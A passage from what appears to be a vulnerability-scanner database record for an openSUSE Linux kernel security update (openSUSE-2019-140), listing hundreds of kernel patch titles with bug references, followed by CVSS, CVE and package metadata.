(bnc#1012382).\n\n - ip_tunnel: Fix name string concatenate in\n __ip_tunnel_create() (bnc#1012382).\n\n - ipv4: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipv4: ipv6: netfilter: Adjust the frag mem limit when\n truesize changes (bsc#1110286).\n\n - ipv6: Check available headroom in ip6_xmit() even\n without options (bnc#1012382).\n\n - ipv6: Consider sk_bound_dev_if when binding a socket to\n a v4 mapped address (bnc#1012382).\n\n - ipv6: explicitly initialize udp6_addr in\n udp_sock_create6() (bnc#1012382).\n\n - ipv6: fix kernel-infoleak in ipv6_local_error()\n (bnc#1012382).\n\n - ipv6: Take rcu_read_lock in __inet6_bind for mapped\n addresses (bnc#1012382).\n\n - isdn: fix kernel-infoleak in capi_unlocked_ioctl\n (bnc#1012382).\n\n - iser: set sector for ambiguous mr status errors\n (bnc#1012382).\n\n - iwlwifi: mvm: fix regulatory domain update when the\n firmware starts (bnc#1012382).\n\n - iwlwifi: mvm: support sta_statistics() even on older\n firmware (bnc#1012382).\n\n - ixgbe: Add function for checking to see if we can reuse\n page (bsc#1100105).\n\n - ixgbe: Add support for build_skb (bsc#1100105).\n\n - ixgbe: Add support for padding packet (bsc#1100105).\n\n - ixgbe: Break out Rx buffer page management\n (bsc#1100105).\n\n - ixgbe: Fix output from ixgbe_dump (bsc#1100105).\n\n - ixgbe: fix possible race in reset subtask (bsc#1101557).\n\n - ixgbe: Make use of order 1 pages and 3K buffers\n independent of FCoE (bsc#1100105).\n\n - ixgbe: Only DMA sync frame length (bsc#1100105).\n\n - ixgbe: recognize 1000BaseLX SFP modules as 1Gbps\n (bnc#1012382).\n\n - ixgbe: Refactor queue disable logic to take completion\n time into account (bsc#1101557).\n\n - ixgbe: Reorder Tx/Rx shutdown to reduce time needed to\n stop device (bsc#1101557).\n\n - ixgbe: Update code to better handle incrementing page\n count (bsc#1100105).\n\n - ixgbe: Update driver to make use of DMA attributes in Rx\n path (bsc#1100105).\n\n - ixgbe: Use length to determine if descriptor is done\n (bsc#1100105).\n\n - jffs2: Fix use of uninitialized delayed_work, lockdep\n breakage (bnc#1012382).\n\n - kabi: hwpoison, memory_hotplug: allow hwpoisoned pages\n to be offlined (bnc#1116336).\n\n - kabi: reorder new slabinfo fields in struct\n kmem_cache_node (bnc#1116653).\n\n - kbuild: suppress packed-not-aligned warning for default\n setting only (bnc#1012382).\n\n - kconfig: fix file name and line number of\n warn_ignored_character() (bnc#1012382).\n\n - kconfig: fix memory leak when EOF is encountered in\n quotation (bnc#1012382).\n\n - kdb: use memmove instead of overlapping memcpy\n (bnc#1012382).\n\n - kdb: Use strscpy with destination buffer size\n (bnc#1012382).\n\n - kernfs: Replace strncpy with memcpy (bnc#1012382).\n\n - kgdboc: fix KASAN global-out-of-bounds bug in\n param_set_kgdboc_var() (bnc#1012382).\n\n - kgdboc: Fix restrict error (bnc#1012382).\n\n - kgdboc: Fix warning with module build (bnc#1012382).\n\n - kobject: Replace strncpy with memcpy (bnc#1012382).\n\n - kvm/arm64: Fix caching of host MDCR_EL2 value\n (bsc#1121242).\n\n - kvm/arm: Restore banked registers and physical timer\n access on hyp_panic() (bsc#1121240).\n\n - kvm/mmu: Fix race in emulated page table writes\n (bnc#1012382).\n\n - kvm/nVMX: Eliminate vmcs02 pool (bnc#1012382).\n\n - kvm/nVMX: mark vmcs12 pages dirty on L2 exit\n (bnc#1012382).\n\n - kvm/PPC: Move and undef TRACE_INCLUDE_PATH/FILE\n (bnc#1012382).\n\n - kvm/svm: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032).\n\n - kvm/svm: Ensure an IBPB on all affected CPUs when\n freeing a vmcb (bsc#1114648).\n\n - kvm/VMX: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032 bsc#1096242 bsc#1096281).\n\n - kvm/VMX: Emulate MSR_IA32_ARCH_CAPABILITIES\n (bnc#1012382).\n\n - kvm/VMX: introduce alloc_loaded_vmcs (bnc#1012382).\n\n - kvm/VMX: make MSR bitmaps per-VCPU (bnc#1012382).\n\n - kvm/x86: Add IBPB support (bnc#1012382 bsc#1068032\n bsc#1068032).\n\n - kvm/x86: fix empty-body warnings (bnc#1012382).\n\n - kvm/x86: Remove indirect MSR op calls from SPEC_CTRL\n (bnc#1012382).\n\n - kvm/x86: Use jmp to invoke kvm_spurious_fault() from\n .fixup (bnc#1012382).\n\n - leds: call led_pwm_set() in leds-pwm to enforce default\n LED_OFF (bnc#1012382).\n\n - leds: leds-gpio: Fix return value check in\n create_gpio_led() (bnc#1012382).\n\n - leds: turn off the LED and wait for completion on\n unregistering LED class device (bnc#1012382).\n\n - libata: whitelist all SAMSUNG MZ7KM* solid-state disks\n (bnc#1012382).\n\n - libceph: fall back to sendmsg for slab pages\n (bsc#1118316).\n\n - libfc: sync strings with upstream versions\n (bsc#1114763).\n\n - lib/interval_tree_test.c: allow full tree search\n (bnc#1012382).\n\n - lib/interval_tree_test.c: allow users to limit scope of\n endpoint (bnc#1012382).\n\n - lib/interval_tree_test.c: make test options module\n parameters (bnc#1012382).\n\n - libnvdimm, (btt, blk): do integrity setup before\n add_disk() (bsc#1118926).\n\n - libnvdimm, dimm: fix dpa reservation vs uninitialized\n label area (bsc#1118936).\n\n - libnvdimm: fix integer overflow static analysis warning\n (bsc#1118922).\n\n - libnvdimm: fix nvdimm_bus_lock() vs device_lock()\n ordering (bsc#1118915).\n\n - lib/rbtree_test.c: make input module parameters\n (bnc#1012382).\n\n - lib/rbtree-test: lower default params (bnc#1012382).\n\n - llc: do not use sk_eat_skb() (bnc#1012382).\n\n - loop: Fix double mutex_unlock(&loop_ctl_mutex) in\n loop_control_ioctl() (bnc#1012382).\n\n - loop: Fold __loop_release into loop_release\n (bnc#1012382).\n\n - loop: Get rid of loop_index_mutex (bnc#1012382).\n\n - LSM: Check for NULL cred-security on free (bnc#1012382).\n\n - mac80211: Clear beacon_int in ieee80211_do_stop\n (bnc#1012382).\n\n - mac80211: fix reordering of buffered broadcast packets\n (bnc#1012382).\n\n - mac80211_hwsim: fix module init error paths for netlink\n (bnc#1012382).\n\n - mac80211_hwsim: Timer should be initialized before\n device registered (bnc#1012382).\n\n - mac80211: ignore NullFunc frames in the duplicate\n detection (bnc#1012382).\n\n - mac80211: ignore tx status for PS stations in\n ieee80211_tx_status_ext (bnc#1012382).\n\n - matroxfb: fix size of memcpy (bnc#1012382).\n\n - md: batch flush requests (bsc#1119680).\n\n - md: do not check MD_SB_CHANGE_CLEAN in md_allow_write\n (Git-fixes).\n\n - media: dvb-frontends: fix i2c access helpers for KASAN\n (bnc#1012382).\n\n - media: em28xx: Fix misplaced reset of\n dev->v4l::field_count (bnc#1012382).\n\n - media: em28xx: Fix use-after-free when disconnecting\n (bnc#1012382).\n\n - media: firewire: Fix app_info parameter type in\n avc_ca(,_app)_info (bnc#1012382).\n\n - media: vb2: be sure to unlock mutex on errors\n (bnc#1012382).\n\n - media: vb2: vb2_mmap: move lock up (bnc#1012382).\n\n - media: vivid: fix error handling of kthread_run\n (bnc#1012382).\n\n - media: vivid: free bitmap_cap when updating\n std/timings/etc (bnc#1012382).\n\n - media: vivid: set min width/height to a value > 0\n (bnc#1012382).\n\n - mfd: tps6586x: Handle interrupts on suspend\n (bnc#1012382).\n\n - mips: Align kernel load address to 64KB (bnc#1012382).\n\n - mips: Ensure pmd_present() returns false after\n pmd_mknotpresent() (bnc#1012382).\n\n - mips: fix mips_get_syscall_arg o32 check (bnc#1012382).\n\n - mips: fix n32 compat_ipc_parse_version (bnc#1012382).\n\n - mips: ralink: Fix mt7620 nd_sd pinmux (bnc#1012382).\n\n - MIPS: SiByte: Enable swiotlb for SWARM, LittleSur and\n BigSur (bnc#1012382).\n\n - misc: mic/scif: fix copy-paste error in\n scif_create_remote_lookup (bnc#1012382).\n\n - mmc: atmel-mci: do not assume idle after\n atmci_request_end (bnc#1012382).\n\n - mmc: core: Reset HPI enabled state during re-init and in\n case of errors (bnc#1012382).\n\n - mm: cleancache: fix corruption on missed inode\n invalidation (bnc#1012382).\n\n - MMC: OMAP: fix broken MMC on OMAP15XX/OMAP5910/OMAP310\n (bnc#1012382).\n\n - mmc: omap_hsmmc: fix DMA API warning (bnc#1012382).\n\n - mm, devm_memremap_pages: kill mapping 'System RAM'\n support (bnc#1012382).\n\n - mm: do not miss the last page because of round-off error\n (bnc#1118798).\n\n - mm, hugetlb: fix huge_pte_alloc BUG_ON (bsc#1119204).\n\n - mm: hwpoison: call shake_page() after try_to_unmap() for\n mlocked page (bnc#1116336).\n\n - mm: lower the printk loglevel for __dump_page messages\n (generic hotplug debugability).\n\n - mm, memory_hotplug: be more verbose for memory offline\n failures (generic hotplug debugability).\n\n - mm, memory_hotplug: drop pointless block alignment\n checks from __offline_pages (generic hotplug\n debugability).\n\n - mm, memory_hotplug: print reason for the offlining\n failure (generic hotplug debugability).\n\n - mm: mlock: avoid increase mm->locked_vm on mlock() when\n already mlock2(,MLOCK_ONFAULT) (bnc#1012382).\n\n - mm/nommu.c: Switch __get_user_pages_unlocked() to use\n __get_user_pages() (bnc#1012382).\n\n - mm: only report isolation failures when offlining memory\n (generic hotplug debugability).\n\n - mm/page-writeback.c: do not break integrity writeback on\n ->writepage() error (bnc#1012382).\n\n - mm: Preserve _PAGE_DEVMAP across mprotect() calls\n (bsc#1118790).\n\n - mm: print more information about mapping in __dump_page\n (generic hotplug debugability).\n\n - mm, proc: be more verbose about unstable VMA flags in\n /proc/<pid>/smaps (bnc#1012382).\n\n - mm: put_and_wait_on_page_locked() while page is migrated\n (bnc#1109272).\n\n - mm: remove write/force parameters from\n __get_user_pages_locked() (bnc#1012382 bsc#1027260).\n\n - mm: remove write/force parameters from\n __get_user_pages_unlocked() (bnc#1012382 bsc#1027260).\n\n - mm: replace __access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace get_user_pages_locked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages_unlocked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages() write/force parameters with\n gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_vaddr_frames() write/force parameters\n with gup_flags (bnc#1012382).\n\n - mm, slab: faster active and free stats (bsc#116653, VM\n Performance).\n\n - mm/slab: improve performance of gathering slabinfo stats\n (bsc#116653, VM Performance).\n\n - mm, slab: maintain total slab count instead of active\n count (bsc#116653, VM Performance).\n\n - Move patches to sorted range, p1\n\n - mv88e6060: disable hardware level MAC learning\n (bnc#1012382).\n\n - mwifiex: Fix NULL pointer dereference in skb_dequeue()\n (bnc#1012382).\n\n - mwifiex: fix p2p device does not find in scan problem\n (bnc#1012382).\n\n - namei: allow restricted O_CREAT of FIFOs and regular\n files (bnc#1012382).\n\n - neighbour: Avoid writing before skb->head in\n neigh_hh_output() (bnc#1012382).\n\n - net: 8139cp: fix a BUG triggered by changing mtu with\n network traffic (bnc#1012382).\n\n - net: amd: add missing of_node_put() (bnc#1012382).\n\n - net: bcmgenet: fix OF child-node lookup (bnc#1012382).\n\n - net: bridge: fix a bug on using a neighbour cache entry\n without checking its state (bnc#1012382).\n\n - net: call sk_dst_reset when set SO_DONTROUTE\n (bnc#1012382).\n\n - net: ena: fix crash during ena_remove() (bsc#1108240).\n\n - net: ena: update driver version from 2.0.1 to 2.0.2\n (bsc#1108240).\n\n - net: faraday: ftmac100: remove netif_running(netdev)\n check before disabling interrupts (bnc#1012382).\n\n - netfilter: nf_tables: fix oops when inserting an element\n into a verdict map (bnc#1012382).\n\n - net: hisilicon: remove unexpected free_netdev\n (bnc#1012382).\n\n - net/ibmvnic: Fix RTNL deadlock during device reset\n (bnc#1115431).\n\n - net: ipv4: do not handle duplicate fragments as\n overlapping (bsc#1116345).\n\n - net/mlx4_core: Correctly set PFC param if global pause\n is turned off (bsc#1015336 bsc#1015337 bsc#1015340).\n\n - net/mlx4_core: Fix uninitialized variable compilation\n warning (bnc#1012382).\n\n - net/mlx4_core: Zero out lkey field in SW2HW_MPT fw\n command (bnc#1012382).\n\n - net/mlx4: Fix UBSAN warning of signed integer overflow\n (bnc#1012382).\n\n - net: phy: do not allow __set_phy_supported to add\n unsupported modes (bnc#1012382).\n\n - net: Prevent invalid access to skb->prev in\n __qdisc_drop_all (bnc#1012382).\n\n - netrom: fix locking in nr_find_socket() (bnc#1012382).\n\n - net: speed up skb_rbtree_purge() (bnc#1012382).\n\n - net: thunderx: fix NULL pointer dereference in\n nic_remove (bnc#1012382).\n\n - nfc: nfcmrvl_uart: fix OF child-node lookup\n (bnc#1012382).\n\n - nfit: skip region registration for incomplete control\n regions (bsc#1118930).\n\n - nfsv4: Do not exit the state manager without clearing\n NFS4CLNT_MANAGER_RUNNING (git-fixes).\n\n - nvme: validate controller state before rescheduling keep\n alive (bsc#1103257).\n\n - ocfs2: fix deadlock caused by ocfs2_defrag_extent()\n (bnc#1012382).\n\n - ocfs2: fix panic due to unrecovered local alloc\n (bnc#1012382).\n\n - ocfs2: fix potential use after free (bnc#1012382).\n\n - of: add helper to lookup compatible child node\n (bnc#1012382).\n\n - omap2fb: Fix stack memory disclosure (bsc#1106929)\n\n - packet: Do not leak dev refcounts on error exit\n (bnc#1012382).\n\n - packet: validate address length (bnc#1012382).\n\n - packet: validate address length if non-zero\n (bnc#1012382).\n\n - pci: altera: Check link status before retrain link\n (bnc#1012382).\n\n - pci: altera: Fix altera_pcie_link_is_up() (bnc#1012382).\n\n - pci: altera: Move retrain from fixup to\n altera_pcie_host_init() (bnc#1012382).\n\n - pci: altera: Poll for link training status after\n retraining the link (bnc#1012382).\n\n - pci: altera: Poll for link up status after retraining\n the link (bnc#1012382).\n\n - pci: altera: Reorder read/write functions (bnc#1012382).\n\n - pci: altera: Rework config accessors for use without a\n struct pci_bus (bnc#1012382).\n\n - perf/bpf: Convert perf_event_array to use struct file\n (bsc#1119967).\n\n - perf intel-pt: Fix error with config term 'pt=0'\n (bnc#1012382).\n\n - perf parse-events: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - perf pmu: Suppress potential format-truncation warning\n (bnc#1012382).\n\n - perf svghelper: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - pinctrl: sunxi: a83t: Fix IRQ offset typo for PH11\n (bnc#1012382).\n\n - platform/x86: asus-wmi: Tell the EC the OS will handle\n the display off hotkey (bnc#1012382).\n\n - powerpc/64s: consolidate MCE counter increment\n (bsc#1094244).\n\n - powerpc/boot: Fix random libfdt related build errors\n (bnc#1012382).\n\n - powerpc/boot: Request no dynamic linker for boot wrapper\n (bsc#1070805).\n\n - powerpc/cacheinfo: Report the correct shared_cpu_map on\n big-cores (bsc#1109695).\n\n - powerpc: Detect the presence of big-cores via 'ibm,\n thread-groups' (bsc#1109695).\n\n - powerpc: Fix COFF zImage booting on old powermacs\n (bnc#1012382).\n\n - powerpc, hotplug: Avoid to touch non-existent cpumasks\n (bsc#1109695).\n\n - powerpc: make use of for_each_node_by_type() instead of\n open-coding it (bsc#1109695).\n\n - powerpc/msi: Fix NULL pointer access in teardown code\n (bnc#1012382).\n\n - powerpc/numa: Suppress 'VPHN is not supported' messages\n (bnc#1012382).\n\n - powerpc/pseries/cpuidle: Fix preempt warning\n (bnc#1012382).\n\n - powerpc/setup: Add cpu_to_phys_id array (bsc#1109695).\n\n - powerpc/smp: Add cpu_l2_cache_map (bsc#1109695).\n\n - powerpc/smp: Add Power9 scheduler topology\n (bsc#1109695).\n\n - powerpc/smp: Rework CPU topology construction\n (bsc#1109695).\n\n - powerpc/smp: Use cpu_to_chip_id() to find core siblings\n (bsc#1109695).\n\n - powerpc/traps: restore recoverability of machine_check\n interrupts (bsc#1094244).\n\n - powerpc: Use cpu_smallcore_sibling_mask at SMT level on\n bigcores (bsc#1109695).\n\n - powerpc/xmon: Fix invocation inside lock region\n (bsc#1122885).\n\n - power: supply: olpc_battery: correct the temperature\n units (bnc#1012382).\n\n - proc: Remove empty line in /proc/self/status\n (bnc#1012382 bsc#1094823).\n\n - pstore: Convert console write to use ->write_buf\n (bnc#1012382).\n\n - pstore/ram: Do not treat empty buffers as valid\n (bnc#1012382).\n\n - qed: Fix bitmap_weight() check (bsc#1019695).\n\n - qed: Fix PTT leak in qed_drain() (bnc#1012382).\n\n - qed: Fix QM getters to always return a valid pq\n (bsc#1019695 ).\n\n - qed: Fix reading wrong value in loop condition\n (bnc#1012382).\n\n - r8169: Add support for new Realtek Ethernet\n (bnc#1012382).\n\n - rapidio/rionet: do not free skb before reading its\n length (bnc#1012382).\n\n - Refresh\n patches.kabi/x86-cpufeature-preserve-numbers.patch.\n (bsc#1122651)\n\n - Revert 'drm/rockchip: Allow driver to be shutdown on\n reboot/kexec' (bsc#1106929)\n\n - Revert 'exec: avoid gcc-8 warning for get_task_comm'\n (kabi).\n\n - Revert 'iommu/io-pgtable-arm: Check for v7s-incapable\n systems' (bsc#1106105).\n\n - Revert 'PCI/ASPM: Do not initialize link state when\n aspm_disabled is set' (bsc#1106105).\n\n - Revert 'usb: musb: musb_host: Enable HCD_BH flag to\n handle urb return in bottom half' (bsc#1047487).\n\n - Revert 'wlcore: Add missing PM call for\n wlcore_cmd_wait_for_event_or_timeout()' (bnc#1012382).\n\n - rocker: fix rocker_tlv_put_* functions for KASAN\n (bnc#1012382).\n\n - rtc: snvs: add a missing write sync (bnc#1012382).\n\n - rtc: snvs: Add timeouts to avoid kernel lockups\n (bnc#1012382).\n\n - rtnetlink: ndo_dflt_fdb_dump() only work for\n ARPHRD_ETHER devices (bnc#1012382).\n\n - s390/cpum_cf: Reject request for sampling in event\n initialization (bnc#1012382).\n\n - s390/mm: Check for valid vma before zapping in\n gmap_discard (bnc#1012382).\n\n - s390/qeth: fix length check in SNMP processing\n (bnc#1012382).\n\n - sbus: char: add of_node_put() (bnc#1012382).\n\n - scsi: bfa: convert to strlcpy/strlcat (bnc#1012382\n bsc#1019683, ).\n\n - scsi: bnx2fc: Fix NULL dereference in error handling\n (bnc#1012382).\n\n - scsi: Create two versions of\n scsi_internal_device_unblock() (bsc#1119877).\n\n - scsi: csiostor: Avoid content leaks and casts\n (bnc#1012382).\n\n - scsi: Introduce scsi_start_queue() (bsc#1119877).\n\n - scsi: libiscsi: Fix NULL pointer dereference in\n iscsi_eh_session_reset (bnc#1012382).\n\n - scsi: lpfc: Add Buffer overflow check, when nvme_info\n larger than PAGE_SIZE (bsc#1102660).\n\n - scsi: lpfc: devloss timeout race condition caused NULL\n pointer reference (bsc#1102660).\n\n - scsi: lpfc: Fix abort error path for NVMET\n (bsc#1102660).\n\n - scsi: lpfc: fix block guard enablement on SLI3 adapters\n (bsc#1079935).\n\n - scsi: lpfc: Fix driver crash when re-registering NVME\n rports (bsc#1102660).\n\n - scsi: lpfc: Fix ELS abort on SLI-3 adapters\n (bsc#1102660).\n\n - scsi: lpfc: Fix list corruption on the completion queue\n (bsc#1102660).\n\n - scsi: lpfc: Fix NVME Target crash in defer rcv logic\n (bsc#1102660).\n\n - scsi: lpfc: Fix panic if driver unloaded when port is\n offline (bsc#1102660).\n\n - scsi: lpfc: update driver version to 11.4.0.7-5\n (bsc#1102660).\n\n - scsi: Make __scsi_remove_device go straight from BLOCKED\n to DEL (bsc#1119877).\n\n - scsi: megaraid: fix out-of-bound array accesses\n (bnc#1012382).\n\n - scsi: Protect SCSI device state changes with a mutex\n (bsc#1119877).\n\n - scsi: qedi: Add ISCSI_BOOT_SYSFS to Kconfig\n (bsc#1043083).\n\n - scsi: Re-export scsi_internal_device_(,un)_block()\n (bsc#1119877).\n\n - scsi: sd: Fix cache_type_store() (bnc#1012382).\n\n - scsi: Split scsi_internal_device_block() (bsc#1119877).\n\n - scsi: target: add emulate_pr backstore attr to toggle PR\n support (bsc#1091405).\n\n - scsi: target: drop unused pi_prot_format attribute\n storage (bsc#1091405).\n\n - scsi: target: use consistent left-aligned ASCII INQUIRY\n data (bnc#1012382).\n\n - scsi: ufs: fix bugs related to NULL pointer access and\n array size (bnc#1012382).\n\n - scsi: ufs: fix race between clock gating and devfreq\n scaling work (bnc#1012382).\n\n - scsi: ufshcd: Fix race between clk scaling and ungate\n work (bnc#1012382).\n\n - scsi: ufshcd: release resources if probe fails\n (bnc#1012382).\n\n - scsi: use 'inquiry_mutex' instead of 'state_mutex'\n (bsc#1119877).\n\n - scsi: vmw_pscsi: Rearrange code to avoid multiple calls\n to free_irq during unload (bnc#1012382).\n\n - scsi: zfcp: fix posting too many status read buffers\n leading to adapter shutdown (bnc#1012382).\n\n - sctp: allocate sctp_sockaddr_entry with kzalloc\n (bnc#1012382).\n\n - sctp: clear the transport of some out_chunk_list chunks\n in sctp_assoc_rm_peer (bnc#1012382).\n\n - sctp: initialize sin6_flowinfo for ipv6 addrs in\n sctp_inet6addr_event (bnc#1012382).\n\n - selftests: Move networking/timestamping from\n Documentation (bnc#1012382).\n\n - selinux: fix GPF on invalid policy (bnc#1012382).\n\n - seq_file: fix incomplete reset on read from zero offset\n (Git-fixes).\n\n - series.conf: Move\n 'patches.fixes/aio-hold-an-extra-file-reference-over-AIO\n -read-write.patch' into sorted section.\n\n - slab: alien caches must not be initialized if the\n allocation of the alien cache failed (bnc#1012382).\n\n - sock: Make sock->sk_stamp thread-safe (bnc#1012382).\n\n - spi: bcm2835: Avoid finishing transfer prematurely in\n IRQ mode (bnc#1012382).\n\n - spi: bcm2835: Fix book-keeping of DMA termination\n (bnc#1012382).\n\n - spi: bcm2835: Fix race on DMA termination (bnc#1012382).\n\n - spi: bcm2835: Unbreak the build of esoteric configs\n (bnc#1012382).\n\n - sr: pass down correctly sized SCSI sense buffer\n (bnc#1012382).\n\n - Staging: lustre: remove two build warnings\n (bnc#1012382).\n\n - staging: rts5208: fix gcc-8 logic error warning\n (bnc#1012382).\n\n - staging: speakup: Replace strncpy with memcpy\n (bnc#1012382).\n\n - sunrpc: Fix a bogus get/put in generic_key_to_expire()\n (bnc#1012382).\n\n - sunrpc: Fix a potential race in xprt_connect()\n (git-fixes).\n\n - sunrpc: fix cache_head leak due to queued request\n (bnc#1012382).\n\n - sunrpc: Fix leak of krb5p encode pages (bnc#1012382).\n\n - sunrpc: handle ENOMEM in rpcb_getport_async\n (bnc#1012382).\n\n - swiotlb: clean up reporting (bnc#1012382).\n\n - sysfs: Disable lockdep for driver bind/unbind files\n (bnc#1012382).\n\n - sysv: return 'err' instead of 0 in __sysv_write_inode\n (bnc#1012382).\n\n - target/iscsi: avoid NULL dereference in CHAP auth error\n path (bsc#1117165).\n\n - target: se_dev_attrib.emulate_pr ABI stability\n (bsc#1091405).\n\n - tcp: fix NULL ref in tail loss probe (bnc#1012382).\n\n - timer/debug: Change /proc/timer_list from 0444 to 0400\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_bearer_enable\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_doit\n (bnc#1012382).\n\n - tipc: fix uninit-value in\n tipc_nl_compat_link_reset_stats (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_link_set\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_name_table_dump\n (bnc#1012382).\n\n - tmpfs: make lseek(SEEK_DATA/SEK_HOLE) return ENXIO with\n a negative offset (bnc#1012382).\n\n - tpm: fix response size validation in tpm_get_random()\n (bsc#1020645, git-fixes).\n\n - tracing: Fix bad use of igrab in trace_uprobe.c\n (bsc#1120046).\n\n - tracing: Fix memory leak in set_trigger_filter()\n (bnc#1012382).\n\n - tracing: Fix memory leak of instance function hash\n filters (bnc#1012382).\n\n - tty/ldsem: Wake up readers after timed out down_write()\n (bnc#1012382).\n\n - tty: serial: 8250_mtk: always resume the device in probe\n (bnc#1012382).\n\n - tty: wipe buffer (bnc#1012382).\n\n - tty: wipe buffer if not echoing data (bnc#1012382).\n\n - tun: forbid iface creation with rtnl ops (bnc#1012382).\n\n - unifdef: use memcpy instead of strncpy (bnc#1012382).\n\n - Update config files: disable f2fs in the rest configs\n (boo#1109665)\n\n - uprobes: Fix handle_swbp() vs. unregister() + register()\n race once more (bnc#1012382).\n\n - usb: Add USB_QUIRK_DELAY_CTRL_MSG quirk for Corsair K70\n RGB (bnc#1012382).\n\n - usb: appledisplay: Add 27' Apple Cinema Display\n (bnc#1012382).\n\n - usb: cdc-acm: send ZLP for Telit 3G Intel based modems\n (bnc#1012382).\n\n - usb: check usb_get_extra_descriptor for proper size\n (bnc#1012382).\n\n - usb: core: Fix hub port connection events lost\n (bnc#1012382).\n\n - usb: core: quirks: add RESET_RESUME quirk for Cherry\n G230 Stream series (bnc#1012382).\n\n - usb: gadget: dummy: fix nonsensical comparisons\n (bnc#1012382).\n\n - usbnet: ipheth: fix potential recvmsg bug and recvmsg\n bug 2 (bnc#1012382).\n\n - usb: omap_udc: fix crashes on probe error and module\n removal (bnc#1012382).\n\n - usb: omap_udc: fix omap_udc_start() on 15xx machines\n (bnc#1012382).\n\n - usb: omap_udc: fix USB gadget functionality on Palm\n Tungsten E (bnc#1012382).\n\n - usb: omap_udc: use devm_request_irq() (bnc#1012382).\n\n - usb: quirk: add no-LPM quirk on SanDisk Ultra Flair\n device (bnc#1012382).\n\n - usb: r8a66597: Fix a possible concurrency use-after-free\n bug in r8a66597_endpoint_disable() (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL668 series\n (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL678 series\n (bnc#1012382).\n\n - usb: serial: option: add GosunCn ZTE WeLink ME3630\n (bnc#1012382).\n\n - usb: serial: option: add HP lt4132 (bnc#1012382).\n\n - usb: serial: option: add Simcom SIM7500/SIM7600 (MBIM\n mode) (bnc#1012382).\n\n - usb: serial: option: add Telit LN940 series\n (bnc#1012382).\n\n - usb: serial: pl2303: add ids for Hewlett-Packard HP POS\n pole displays (bnc#1012382).\n\n - usb: storage: add quirk for SMI SM3350 (bnc#1012382).\n\n - usb: storage: do not insert sane sense for SPC3+ when\n bad sense specified (bnc#1012382).\n\n - usb: usb-storage: Add new IDs to ums-realtek\n (bnc#1012382).\n\n - usb: xhci: fix timeout for transition from RExit to U0\n (bnc#1012382).\n\n - usb: xhci: fix uninitialized completion when USB3 port\n got wrong status (bnc#1012382).\n\n - usb: xhci: Prevent bus suspend if a port connect change\n or polling state is detected (bnc#1012382).\n\n - v9fs_dir_readdir: fix double-free on p9stat_read error\n (bnc#1012382).\n\n - vfs: Avoid softlockups in drop_pagecache_sb()\n (bsc#1118505).\n\n - vhost: make sure used idx is seen before log in\n vhost_add_used_n() (bnc#1012382).\n\n - virtio/s390: avoid race on vcdev->config (bnc#1012382).\n\n - virtio/s390: fix race in ccw_io_helper() (bnc#1012382).\n\n - VSOCK: Send reset control packet when socket is\n partially bound (bnc#1012382).\n\n - writeback: do not decrement wb->refcnt if !wb->bdi (git\n fixes (writeback)).\n\n - x86/earlyprintk/efi: Fix infinite loop on some screen\n widths (bnc#1012382).\n\n - x86/entry: spell EBX register correctly in documentation\n (bnc#1012382).\n\n - x86/MCE: Export memory_error() (bsc#1114648).\n\n - x86/MCE: Make correctable error detection look at the\n Deferred bit (bsc#1114648).\n\n - x86/mtrr: Do not copy uninitialized gentry fields back\n to userspace (bnc#1012382).\n\n - x86/speculation/l1tf: Drop the swap storage limit\n restriction when l1tf=off (bnc#1114871).\n\n - x86/speculation: Use synthetic bits for IBRS/IBPB/STIBP\n (bnc#1012382).\n\n - xen/balloon: Support xend-based toolstack (bnc#1065600).\n\n - xen/netback: dont overflow meta array (bnc#1099523).\n\n - xen/netfront: tolerate frags with no data (bnc#1012382).\n\n - xen/x86: add diagnostic printout to xen_mc_flush() in\n case of error (bnc#1116183).\n\n - xen: xlate_mmu: add missing header to fix 'W=1' warning\n (bnc#1012382).\n\n - xfrm: Fix bucket count reported to userspace\n (bnc#1012382).\n\n - xfs: Align compat attrlist_by_handle with native\n implementation (git-fixes).\n\n - xfs: fix quotacheck dquot id overflow infinite loop\n (bsc#1121621).\n\n - xhci: Add quirk to workaround the errata seen on Cavium\n Thunder-X2 Soc (bsc#1117162).\n\n - xhci: Do not prevent USB2 bus suspend in state check\n intended for USB3 only (bnc#1012382).\n\n - xhci: Prevent U1/U2 link pm states if exit latency is\n too long (bnc#1012382).\n\n - xprtrdma: Reset credit grant properly after a disconnect\n (git-fixes).\n\n - xtensa: enable coprocessors that are being flushed\n (bnc#1012382).\n\n - xtensa: fix coprocessor context offset definitions\n (bnc#1012382).\n\n - Yama: Check for pid death before checking ancestry\n (bnc#1012382).\n\n - x86/pkeys: Properly copy pkey state at fork()\n (bsc#1106105).", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2019-140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-3460", "CVE-2018-9568", "CVE-2018-19824", "CVE-2018-16862", "CVE-2018-1120", "CVE-2018-16884", "CVE-2019-3459", "CVE-2018-19407", "CVE-2018-20169", "CVE-2018-19985"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", 